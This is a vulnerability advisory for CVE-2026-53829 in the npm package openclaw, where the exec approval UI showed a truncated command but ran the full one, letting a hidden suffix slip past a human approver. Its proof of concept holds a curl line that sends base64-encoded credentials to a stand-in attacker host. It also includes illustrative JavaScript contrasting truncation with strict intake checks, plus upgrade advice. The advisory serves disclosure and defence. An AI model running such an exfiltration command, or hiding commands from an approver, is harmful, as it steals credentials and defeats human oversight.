high · 8 · Jul 2, 2026

CVE-2026-53829: openclaw Exec Approval Display Truncation

Rohit Hatagale
AI Security Researcher, SecureLayer7

Authenticated users could submit an exec command long enough that the approval UI showed only a harmless-looking prefix, hiding a malicious suffix that would still run after the approver clicked appro

Package: openclaw
Ecosystem: npm
Affected: < 2026.5.18
Fixed in: 2026.5.18

The problem

OpenClaw's exec approval flow displayed a truncated version of very long commands in the approval UI, but bound the full original command for execution. An approver reviewed only the visible prefix and had no indication that additional shell operations followed.

This is an approval integrity failure: the displayed command and the executed command were not the same. Any authenticated caller who could create a pending exec approval request could exploit this gap.

Proof of concept

A working proof of concept for this issue in openclaw follows, with the exact payload below.

bash
# Benign prefix fills the visible display window (~2 000 chars); malicious suffix is hidden
python3 -c "
print('Running diagnostics...')
import time; time.sleep(1)
# ... (fill to approval UI display limit) ...
" ; curl -s https://attacker.example/exfil?d=$(cat ~/.openclaw/credentials | base64 -w0)

The approval UI applied a display length cap to the command text before rendering it, but the gateway stored and later executed the full, uncapped command. The split between 'what is shown' and 'what is run' is the root cause, matching CWE-451 (UI Misrepresentation of Critical Information) and CWE-863 (Incorrect Authorization).

The fix, shipped in 2026.5.18, enforces a hard size limit on incoming exec approval requests before they are accepted, so commands that would exceed the display budget are rejected outright rather than silently truncated. The approval payload and the executed command are now always identical.
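The difference between truncating for display and rejecting at intake, as an added example that is not openclaw's code: it contrasts the pre-fix pattern with a strict intake check, adds an executor-side guard, and includes a triage helper for pending approvals. All function names, the record shape and the 2000-character budget are assumptions made for illustration.

```javascript
// Added example: hypothetical names throughout, not openclaw's own code.
// Assumed display budget; the page gives only "~2 000 chars" for the visible window.
const DISPLAY_BUDGET = 2000;

// Pre-fix pattern: the UI gets a prefix, execution is bound to the full text.
function createApprovalTruncating(command) {
  return { displayed: command.slice(0, DISPLAY_BUDGET), bound: command };
}

// Post-fix pattern: reject at intake anything the UI cannot show in full.
function createApprovalStrict(command) {
  if (typeof command !== "string" || command.length === 0) {
    throw new TypeError("command must be a non-empty string");
  }
  // .length counts UTF-16 units, which is never less than the number of
  // rendered characters, so this check errs on the side of rejecting.
  if (command.length > DISPLAY_BUDGET) {
    throw new RangeError(`command length ${command.length} exceeds ${DISPLAY_BUDGET}`);
  }
  return Object.freeze({ displayed: command, bound: command });
}

// Executor-side guard: refuse to run anything the approver did not see in full.
function commandToRun(approval) {
  if (approval.displayed !== approval.bound) {
    throw new Error("displayed text differs from bound command");
  }
  return approval.bound;
}

// Triage helper for pending approvals on an unpatched install: report how many
// characters of each bound command were never shown to the approver.
function hiddenChars(approvals) {
  return approvals
    .map((a, i) => ({ index: i, hidden: a.bound.length - a.displayed.length }))
    .filter((r) => r.hidden > 0);
}

// Constructed sample input: benign padding followed by a placeholder suffix.
const SUFFIX = "; <suffix-not-shown>";
const longCommand = "echo " + "x".repeat(DISPLAY_BUDGET) + SUFFIX;
const shortCommand = "echo diagnostics";
```

With the truncating pattern the sample's suffix never reaches the approver but stays in the bound command; the strict intake check rejects the same input before a pending approval exists.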

The fix

Upgrade to openclaw 2026.5.18 or later. Before upgrading, avoid approving any unusually long exec commands and restrict exec approval capability to trusted operators only.

Reported by steipete.

References: [1][2]
